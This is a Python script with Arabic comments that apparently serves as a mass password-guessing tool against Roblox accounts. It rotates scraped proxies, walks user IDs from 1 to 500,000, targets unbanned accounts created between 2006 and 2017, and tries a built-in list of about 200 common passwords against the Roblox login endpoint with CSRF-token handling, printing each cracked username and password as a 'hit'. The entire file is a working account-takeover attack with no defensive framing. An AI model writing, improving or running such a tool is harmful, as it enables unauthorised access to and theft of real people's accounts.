import requests
import threading
import random
import sys
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style, init

# تهيئة الألوان
init(autoreset=True)

# --- قائمة الباسوردات ---
PASSWORDS = [
    "123456", "admin", "12345678", "123456789", "12345", "password", "Aa123456",
    "1234567890", "Pass@123", "admin123", "1234567", "123123", "111111", 
    "12345678910", "P@ssw0rd", "Password", "Aa@123456", "admintelecom", 
    "Admin@123", "112233", "102030", "654321", "abcd1234", "abc123", 
    "qwerty123", "Abcd@1234", "Pass@1234", "11223344", "admin@123", 
    "87654321", "987654321", "qwerty", "123123123", "1q2w3e4r", "Aa112233",
    "12341234", "qwertyuiop", "11111111", "Admin", "Password@123", "asd123",
    "Aboy1234", "123321", "admin1", "Admin123", "Demo@123", "1q2w3e4r5t",
    "admin1234", "aa123456", "121212", "asdf1234", "888888", "Abcd1234",
    "123456789", "guru123456", "666666", "Welcome@123", "guest", "Password1",
    "123456789a", "Kapler123", "administrator", "1122334455", "Test@123",
    "qwer1234", "asdfghjkl", "Global123@", "10203040", "1234qwer", "India@123",
    "Abcd@123", "1qaz2wsx", "88888888", "123qwe", "12345678a", "secret",
    "Aa123123", "12344321", "123456aA@", "123456a", "a123456", "202020",
    "1234abcd", "admin123456", "qwe123", "101010", "222222", "12121212",
    "welcome", "abc12345", "Abc@1234", "admin12345", "Qwerty123", "12345678900",
    "123654", "555555", "Aa123456789", "1111111111", "12345678901", "q1w2e3r4",
    "password123", "Heslo1234", "22446688", "Abc12345", "vodafone", "999999",
    "bismillah", "a123456789", "Password123", "azerty", "user1234", "1234567891",
    "1234512345", "adminisp", "1234567899", "P@$$w0rd", "Aa12345678", "Passw0rd",
    "zxcvbnm", "adminadmin", "qwerty12345", "gvt12345", "minecraft", "abcd@1234",
    "pakistan", "ADMIN", "10203", "Welcome1", "theworldinyourhand", "aabb1122",
    "test123", "Asdf1234", "54321", "1111111", "a1b2c3d4", "password1", "student",
    "Abc@12345", "Aa102030", "Pass@12345", "135790", "123abc", "cisco", "11111",
    "Aa@12345", "111111111", "p@ssw0rd", "lol123456", "147258369", "123456Aa",
    "Aa@1234567", "Admin@1234", "1234554321", "124578", "12qwaszx", "Abc@123",
    "a12345678", "aa112233", "qwer4321", "a1234567", "Qwerty@123", "12345679",
    "Ab123456", "Aa@123456789", "Abcd1234@", "123qweasd", "Admin1234", "pakistan123",
    "A123456a", "qwerty1234", "1234567a", "abc123456", "turktelekom", "test1234",
    "999999999", "123456788", "Aaa111", "contraseña", "7654321", "1qazxsw2",
    "Password@1", "asdasd", "aaaaaa", "qwerty123456", "246810", "11112222",
    "aaaa1111", "Abc123", "q1w2e3r4t5", "987654", "aa123123", "azerty123",
    "Aa1234567", "abc@123", "changeme", "12345678@", "P@55w0rd", "asd12345",
    "zxcvbnm123", "123admin", "Roblox123", "Roblox", "Roblox1234", "Roblox12345"
]

class Z7F_Professional:
    def __init__(self):
        self.proxies = self._get_proxies()
        self.checked = 0
        self.hits = 0
        self.lock = threading.Lock()

    def _get_proxies(self):
        try:
            r = requests.get("https://api.proxyscrape.com/v2/?request=displayproxies&protocol=http&timeout=5000", timeout=10)
            return r.text.splitlines()
        except:
            return []

    def get_proxy(self):
        if not self.proxies: return None
        p = random.choice(self.proxies)
        return {"http": f"http://{p}", "https": f"http://{p}"}

    def check_id(self, user_id):
        session = requests.Session()
        proxy = self.get_proxy()
        session.proxies.update(proxy)
        
        try:
            u_data = session.get(f"https://users.roblox.com/v1/users/{user_id}", timeout=5).json()
            user = u_data.get("name")
            if not user or u_data.get("isBanned"): return
            
            year = int(u_data.get("created", "2099").split("-")[0])

            if 2006 <= year <= 2017:
                for pwd in PASSWORDS:
                    # تحديث شريط الحالة في سطر واحد ثابت بالأسفل
                    with self.lock:
                        self.checked += 1
                        status = f"{Fore.CYAN}[*] ID: {user_id} | User: {user} | Pass: {pwd[:8]}.. | Hits: {self.hits}"
                        sys.stdout.write(f"\r{status}\033[K")
                        sys.stdout.flush()

                    # إحضار CSRF Token
                    t_req = session.post("https://auth.roblox.com/v2/login", timeout=5)
                    token = t_req.headers.get("x-csrf-token")
                    
                    headers = {"x-csrf-token": token, "Content-Type": "application/json"}
                    payload = {"username": user, "password": pwd}
                    
                    login = session.post("https://auth.roblox.com/v2/login", json=payload, headers=headers, timeout=5).json()
                    
                    if "user" in login:
                        with self.lock:
                            self.hits += 1
                            self._log_hit(u_data, pwd, year)
                        break
        except:
            pass

    def _log_hit(self, info, pwd, year):
        # مسح السطر الحالي للطباعة بوضوح
        sys.stdout.write("\r\033[K") 
        print(f"\n{Fore.GREEN}[+] HIT FOUND!")
        print(f"{Fore.WHITE}NickName : {info.get('displayName')}")
        print(f"{Fore.WHITE}User     : {info.get('name')}")
        print(f"{Fore.WHITE}Password : {pwd}")
        print(f"{Fore.WHITE}Year     : {year}")
        print(f"{Fore.WHITE}ID       : {info.get('id')}")
        print(f"{Fore.WHITE}Bio      : {info.get('description', 'None')}")
        print(f"{Fore.GREEN}{'='*30}\n")

    def start(self, r_start, r_end):
        print(f"{Fore.MAGENTA}[!] Starting Z7F Apocalypse Engine...\n")
        with ThreadPoolExecutor(max_workers=100) as executor:
            executor.map(self.check_id, range(r_start, r_end))

if __name__ == "__main__":
    bot = Z7F_Professional()
    # الفحص من ID 1 إلى 500,000
    bot.start(1, 500000)
